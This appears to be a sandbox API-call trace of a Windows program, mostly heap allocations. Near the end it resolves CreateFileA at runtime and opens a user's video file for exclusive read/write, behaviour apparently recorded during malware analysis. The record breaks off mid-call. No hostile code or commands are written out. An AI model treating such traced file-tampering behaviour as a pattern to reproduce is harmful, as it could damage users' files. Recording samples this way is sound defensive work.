RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0197.281] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0197.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0197.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0197.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0197.281] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0197.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0197.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0197.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0197.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0197.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0197.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0197.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0197.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0197.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0197.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0197.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0197.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0197.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0197.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0197.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0197.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0197.285] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0197.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0197.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0197.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0197.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.289] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0197.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda38 [0197.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0197.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.290] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0197.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0197.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0197.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0197.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.290] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0197.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0197.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0197.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0197.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0197.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv", cchWideChar=90, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 90 [0197.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5a) returned 0x9a5de0 [0197.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv", cchWideChar=90, lpMultiByteStr=0x9a5de0, cbMultiByte=90, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv", lpUsedDefaultChar=0x0) returned 90 [0197.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0197.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0197.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.291] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\jyvwvjydk6qkt4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0197.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0197.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0197.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0197.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0197.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0197.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 